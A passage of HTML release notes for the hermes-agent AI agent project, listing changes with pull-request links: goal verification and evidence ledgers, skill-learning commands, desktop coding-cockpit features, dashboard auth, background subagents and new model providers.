<li>Reliability: reference + aggregator models called through their provider's real route; context window resolved from the aggregator (not the 256K default); auxiliary tasks resolve to the aggregator; virtual provider blocked as a reference/aggregator slot; tolerant of hand-edited preset config (<a href="https://github.com/NousResearch/hermes-agent/pull/53580" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53580/hovercard">#53580</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53780" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53780/hovercard">#53780</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53827" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53827/hovercard">#53827</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53281" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53281/hovercard">#53281</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53275" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53275/hovercard">#53275</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53556" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53556/hovercard">#53556</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>MoA slot provider-identity unified on the single <code>call_llm</code> chokepoint; HermesBench results documented (<a href="https://github.com/NousResearch/hermes-agent/pull/55991" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55991/hovercard">#55991</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53206" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53206/hovercard">#53206</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>✅ Verification &amp; Goals — the agent proves its work</h2>
<ul>
<li><strong>Completion contracts for <code>/goal</code></strong> — state what "done" looks like; the standing-goal loop judges against evidence, not the model's say-so (<a href="https://github.com/NousResearch/hermes-agent/pull/50501" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50501/hovercard">#50501</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong><code>/goal wait &lt;pid&gt;</code></strong> — park the standing-goal loop on a background process instead of re-poking the agent (<a href="https://github.com/NousResearch/hermes-agent/pull/50503" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50503/hovercard">#50503</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Coding verification evidence ledger</strong> — profile-scoped record of canonical project checks detected by <code>agent.coding_context</code>; gateway exposes verification status (<a href="https://github.com/NousResearch/hermes-agent/pull/52285" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52285/hovercard">#52285</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52286" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52286/hovercard">#52286</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><strong><code>pre_verify</code> hook + coding guidance config</strong>; verification stop loop + ad-hoc verification scripts (<a href="https://github.com/NousResearch/hermes-agent/pull/55413" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55413/hovercard">#55413</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52296" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52296/hovercard">#52296</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52297" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52297/hovercard">#52297</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><strong>verify-on-stop defaults OFF</strong> with a one-time v32 migration; skips doc-only edits; surface-aware "auto" default restored; gated off for messaging surfaces (<a href="https://github.com/NousResearch/hermes-agent/pull/53552" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53552/hovercard">#53552</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54740" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54740/hovercard">#54740</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55449" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55449/hovercard">#55449</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52412" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52412/hovercard">#52412</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GodsBoy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GodsBoy">@GodsBoy</a>)</li>
</ul>
<h2>🎓 Self-Improvement (Learn / Journey)</h2>
<ul>
<li><strong><code>/learn &lt;anything&gt;</code></strong> — distill a reusable skill from a directory, URL, or a workflow you just walked through; honors CONTRIBUTING.md skill standards and mixed requirements (<a href="https://github.com/NousResearch/hermes-agent/pull/51506" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51506/hovercard">#51506</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52372" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52372/hovercard">#52372</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55956" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55956/hovercard">#55956</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong><code>/journey</code></strong> — CLI + TUI learning timeline of accumulated memories and skills, with in-place edit/delete (<a href="https://github.com/NousResearch/hermes-agent/pull/55555" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55555/hovercard">#55555</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55859" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55859/hovercard">#55859</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><strong>Cheaper background review</strong> — aux-model routing + context digest + adaptive cadence for the post-turn self-improvement fork (<a href="https://github.com/NousResearch/hermes-agent/pull/49252" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49252/hovercard">#49252</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong><code>memory</code> graph</strong> in the desktop — playable radial timeline of memories + skills over time (<a href="https://github.com/NousResearch/hermes-agent/pull/55226" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55226/hovercard">#55226</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h2>🖥️ Hermes Desktop App</h2>
<h3>Coding cockpit</h3>
<ul>
<li><strong>First-class Projects</strong> — per-profile sidebar, coding rail, review pane, agent project tools (<code>project → repo → lane</code>); remote-gateway-aware folder picker + git cockpit (status, review, worktrees) (<a href="https://github.com/NousResearch/hermes-agent/pull/49037" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49037/hovercard">#49037</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54385" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54385/hovercard">#54385</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><strong>Multi-terminal panel</strong> with read-only agent terminals; persist &amp; restore terminal tabs + scrollback across relaunch (<a href="https://github.com/NousResearch/hermes-agent/pull/54517" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54517/hovercard">#54517</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54585" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54585/hovercard">#54585</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><strong>PR-style file diffs in chat</strong>; in-app spot editor for the file preview pane; inline rich embeds, diagrams &amp; alerts in assistant markdown (<a href="https://github.com/NousResearch/hermes-agent/pull/50731" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50731/hovercard">#50731</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52772" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52772/hovercard">#52772</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52935" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52935/hovercard">#52935</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h3>UX &amp; surfaces</h3>
<ul>
<li>Conversation timeline rail for long threads; context-usage breakdown popover; read-only spectator transcript for subagent watch windows; pop the composer into a draggable floating window (<a href="https://github.com/NousResearch/hermes-agent/pull/51094" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51094/hovercard">#51094</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54907" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54907/hovercard">#54907</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55033" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55033/hovercard">#55033</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49488" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49488/hovercard">#49488</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>)</li>
<li>Read replies aloud (auto-TTS) composer toggle; remember window size/position/maximized across launches; redesigned clarify prompt; shared overlay Panel primitive for cron/profiles/agents (<a href="https://github.com/NousResearch/hermes-agent/pull/55154" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55154/hovercard">#55154</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52086" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52086/hovercard">#52086</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52993" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52993/hovercard">#52993</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54558" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54558/hovercard">#54558</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Backup import/create/download from the web UI; add context-usage popover; flag already-installed themes in install pickers; config-driven Electron launch flags + GPU policy (<a href="https://github.com/NousResearch/hermes-agent/pull/54611" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54611/hovercard">#54611</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55410" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55410/hovercard">#55410</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53991" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53991/hovercard">#53991</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><strong>Pets</strong> — roaming pet (opt-in), calmer/realistic roam, Alt+wheel scaling never cropped, frame-perfect hatch flow + CPU-safe chroma, pop-out overlay + notifications (<a href="https://github.com/NousResearch/hermes-agent/pull/55114" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55114/hovercard">#55114</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55400" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55400/hovercard">#55400</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52877" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52877/hovercard">#52877</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47959" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47959/hovercard">#47959</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52303" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52303/hovercard">#52303</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h3>Refactor wave (composer / god-file de-entangle)</h3>
<ul>
<li>Decomposed the composer into isolated engine hooks; extracted branch/esc/url/placeholder/popout engines; split <code>thread.tsx</code>, <code>sidebar/index.tsx</code>, onboarding overlay, and <code>use-prompt-actions</code> god files into focused modules; shared WebSocket layer decoupling desktop from dashboard (<code>hermes serve</code>) (<a href="https://github.com/NousResearch/hermes-agent/pull/55500" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55500/hovercard">#55500</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55842" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55842/hovercard">#55842</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55451" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55451/hovercard">#55451</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55453" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55453/hovercard">#55453</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55807" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55807/hovercard">#55807</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55504" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55504/hovercard">#55504</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54568" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54568/hovercard">#54568</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>perf: bound tool-result rendering so big <code>/learn</code> runs don't freeze; fast session switching under load (<a href="https://github.com/NousResearch/hermes-agent/pull/52273" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52273/hovercard">#52273</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52620" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52620/hovercard">#52620</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h2>📊 Web Dashboard</h2>
<ul>
<li>Auto-initiate portal SSO redirect on unauthenticated load; interactive auth setup on no-provider non-loopback bind; confidential-client (<code>client_secret</code>) support in self-hosted OIDC (<a href="https://github.com/NousResearch/hermes-agent/pull/54846" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54846/hovercard">#54846</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50551" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50551/hovercard">#50551</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55344" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55344/hovercard">#55344</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
<li>Catalogue all memory-provider API keys in <code>OPTIONAL_ENV_VARS</code>; list &amp; add arbitrary custom <code>.env</code> keys on the Keys page; expose cron job execution fields; backup import/create/download (<a href="https://github.com/NousResearch/hermes-agent/pull/54546" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54546/hovercard">#54546</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54552" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54552/hovercard">#54552</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53551" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53551/hovercard">#53551</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54611" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54611/hovercard">#54611</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Offload PTY spawn/close off the event loop; exclude non-interactive providers from interactive login surfaces (<a href="https://github.com/NousResearch/hermes-agent/pull/53227" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53227/hovercard">#53227</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53239" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53239/hovercard">#53239</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IAvecilla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IAvecilla">@IAvecilla</a>)</li>
</ul>
<h2>🏗️ Core Agent &amp; Architecture</h2>
<h3>Delegation &amp; subagents</h3>
<ul>
<li><strong>Background fan-out</strong> — parallel subagents run in the background, one consolidated return when all finish; calm "will resume" affordance for background <code>delegate_task</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/49734" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49734/hovercard">#49734</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52756" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52756/hovercard">#52756</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Track background subagents in the CLI + TUI status bar (<a href="https://github.com/NousResearch/hermes-agent/pull/51441" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51441/hovercard">#51441</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/51485" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51485/hovercard">#51485</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Agent loop, tools &amp; coding context</h3>
<ul>
<li>One-shot LLM helper + <code>llm.oneshot</code> gateway RPC; expose coding-context project facts (<code>project.facts</code> RPC) (<a href="https://github.com/NousResearch/hermes-agent/pull/51261" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51261/hovercard">#51261</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/51259" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51259/hovercard">#51259</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><code>web_extract</code> truncate-and-store instead of LLM summarization; concurrent @-reference expansion (<a href="https://github.com/NousResearch/hermes-agent/pull/54843" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54843/hovercard">#54843</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55207" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55207/hovercard">#55207</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Friendly human-phrased tool labels for built-in tools; <code>/reasoning full</code> (uncapped thinking); <code>/timestamps</code> + timestamps in <code>/history</code>; <code>/prompt</code> composes in <code>$EDITOR</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/55166" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55166/hovercard">#55166</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50499" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50499/hovercard">#50499</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50506" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50506/hovercard">#50506</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50509" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50509/hovercard">#50509</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Per-reasoning-model stale-timeout floor in stream + non-stream detectors; escalate SIGTERM→SIGKILL on host-pid termination after grace (<a href="https://github.com/NousResearch/hermes-agent/pull/52845" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52845/hovercard">#52845</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50489" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50489/hovercard">#50489</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Multiple <code>HERMES_WRITE_SAFE_ROOT</code> dirs; opt-in HTTP/WS body capture to an isolated, share-excluded <code>gui_bodies.log</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/53292" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53292/hovercard">#53292</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49044" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49044/hovercard">#49044</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
</ul>
<h3>Compression &amp; sessions</h3>
<ul>
<li>In-place compaction option (single session id); flip <code>in_place</code> default to True with a guard fix (<a href="https://github.com/NousResearch/hermes-agent/pull/49739" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49739/hovercard">#49739</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52658" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52658/hovercard">#52658</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Backup includes <code>projects.db</code> and kanban boards in the pre-update snapshot (<a href="https://github.com/NousResearch/hermes-agent/pull/52990" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52990/hovercard">#52990</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
</ul>
<h3>Providers &amp; models</h3>
<ul>
<li><strong>Google Vertex AI</strong> first-class provider for Gemini over the OpenAI-compatible endpoint — auto-mints and refreshes short-lived OAuth2 tokens from a service-account JSON / ADC (no static key); salvages &amp; modernizes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4248493655" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/8427" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8427/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/8427">#8427</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/slawt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slawt">@slawt</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/56363" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56363/hovercard">#56363</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/slawt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slawt">@slawt</a>)</li>
<li>Krea via managed Nous Subscription gateway; Z.AI endpoint picker (Global/China/Coding Plan); Ollama-cloud reasoning_effort wiring; remove google-gemini-cli + google-antigravity OAuth providers (<a href="https://github.com/NousResearch/hermes-agent/pull/52647" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52647/hovercard">#52647</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52364" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52364/hovercard">#52364</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/51494" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51494/hovercard">#51494</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50492" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50492/hovercard">#50492</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" 